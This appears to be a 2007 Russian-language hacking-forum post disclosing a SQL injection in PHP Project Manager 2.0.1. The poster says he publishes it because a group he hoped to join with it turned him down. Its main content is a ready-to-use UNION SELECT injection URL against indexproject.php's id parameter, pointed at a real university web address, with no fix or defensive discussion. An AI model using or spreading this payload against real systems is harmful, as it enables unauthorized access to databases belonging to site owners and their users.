sql inj PHP Project Manager => 2.0.1 |
23.03.2007, 13:09
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
С нами:
10669286
Репутация:
1942
|
|
sql inj PHP Project Manager => 2.0.1
изначально уязвимость предполагалось для того чтобы меня взяли в моа, но т.к. меня послали - я её выкладываю.
PHP Project Manager
версия => 2.0.1
описание:
Уязвимость существует в сценарии indexproject.php из-за недостаточной обработки входных данных.
пример:
Код:
http://www.ia.unc.edu/dev/manager/indexproject.php?id=-35+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35/*
на секлабе баги нету(ну и вроде в др местах тоже) |
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Древовидный вид